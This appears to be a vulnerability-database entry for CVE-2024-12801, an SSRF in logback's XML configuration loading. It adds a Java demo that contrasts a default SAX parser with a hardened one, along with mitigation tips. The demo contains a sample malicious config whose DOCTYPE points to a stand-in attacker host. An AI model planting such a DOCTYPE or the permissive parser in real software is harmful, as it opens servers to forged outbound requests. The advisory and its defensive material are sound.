CVE-2024-12801
EPSS: 0.06%
QOS.CH logback-core Server-Side Request Forgery vulnerability
Published: 2024/12/19   Modified: 2026/4/28
Description
Server-Side Request Forgery (SSRF) in SaxEventRecorder in QOS.CH logback versions 0.1 through 1.3.14 and 1.4.0 through 1.5.12 on the Java platform allows an attacker who can tamper with a logback XML configuration file to make the application issue forged requests. The attack involves modifying the DOCTYPE declaration in the XML configuration file: when the SAX parser used to load the configuration resolves the external DTD named in that declaration, the request is made from the host running the application. Exploitation therefore requires write access to, or the ability to substitute, the configuration file that logback loads (reflected in the AT:P / PR:L metrics of the vector below).
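The following is an added example and is not logback's own code nor the referenced fix commit. It shows a constructed logback-style configuration whose DOCTYPE points at an external URL (the `attacker.invalid` host and the class name are assumptions for illustration), and contrasts a SAX parser left at JAXP defaults, which will attempt to fetch that DTD, with one hardened so that a DOCTYPE is rejected before any network access happens. The hardened settings are the standard JAXP/Xerces features for this purpose, not a claim about which ones the logback patch chose.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

public class LogbackDoctypeDemo {

    // Constructed sample: a logback-style config whose DOCTYPE names an external DTD.
    // A parser that loads external DTDs will issue an HTTP request to attacker.invalid
    // (an assumed, non-routable host) when it reaches this declaration: that request is the SSRF.
    static final String MALICIOUS_CONFIG =
          "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
        + "<!DOCTYPE configuration SYSTEM \"http://attacker.invalid/logback.dtd\">\n"
        + "<configuration>\n"
        + "  <root level=\"INFO\"/>\n"
        + "</configuration>\n";

    /** Parser at JAXP defaults: non-validating, but most implementations still fetch the external DTD. */
    static SAXParser permissiveParser() throws Exception {
        SAXParserFactory spf = SAXParserFactory.newInstance();
        spf.setValidating(false);
        spf.setNamespaceAware(true);
        return spf.newSAXParser();
    }

    /** Hardened parser: refuses any DOCTYPE outright and, as defence in depth,
     *  disables external entities and external DTD loading. */
    static SAXParser hardenedParser() throws Exception {
        SAXParserFactory spf = SAXParserFactory.newInstance();
        spf.setValidating(false);
        spf.setNamespaceAware(true);
        spf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // A logback config never legitimately needs a DTD, so reject the declaration itself.
        spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        return spf.newSAXParser();
    }

    /** Parses the document with a no-op handler and reports whether it was accepted. */
    static String parse(SAXParser parser, String xml) {
        try {
            parser.parse(new InputSource(new StringReader(xml)), new DefaultHandler());
            return "parsed";
        } catch (SAXException e) {
            // With disallow-doctype-decl the hardened parser fails here, before any I/O.
            return "rejected: " + e.getMessage();
        } catch (Exception e) {
            // The permissive parser typically ends up here: it tried to fetch the DTD and the I/O failed.
            return "error: " + e.getMessage();
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("hardened:   " + parse(hardenedParser(), MALICIOUS_CONFIG));
        // Only attempt the permissive parse on request, since it tries to contact the DOCTYPE host.
        if (args.length > 0 && "--permissive".equals(args[0])) {
            System.out.println("permissive: " + parse(permissiveParser(), MALICIOUS_CONFIG));
        }
    }
}
```

Run with `java LogbackDoctypeDemo` to see the DOCTYPE rejected, and with `--permissive` to watch the default parser attempt the outbound fetch. Where the parser configuration is not under your control (for example an older logback you cannot upgrade yet), the JVM-wide property `-Djavax.xml.accessExternalDTD=""` blocks external DTD access for all JAXP parsers in the process, and a simple check that no configuration file contains `<!DOCTYPE` is a cheap detection for the tampering this CVE describes.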
Affected packages (2)
- Debian/logback: from 0
- Maven/ch.qos.logback:logback-core: >= 1.4.0, < 1.5.13
Note that the Maven range listed here covers only the 1.4.x/1.5.x line; the description above also lists 0.1 through 1.3.14 as affected, with 1.3.15 as the corresponding fix release per the referenced release notes.
CVSS score
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:L/VI:N/VA:L/SC:H/SI:H/SA:H/V:D/U:Clear |
References (6)
- ADVISORY: https://nvd.nist.gov/vuln/detail/CVE-2024-12801
- ADVISORY: https://security-tracker.debian.org/tracker/CVE-2024-12801
- PATCH: https://github.com/qos-ch/logback
- WEB: https://github.com/qos-ch/logback/commit/5f05041cba4c4ac0a62748c5c527a2da48999f2d
- WEB: https://logback.qos.ch/news.html#1.3.15
- WEB: https://logback.qos.ch/news.html#1.5.13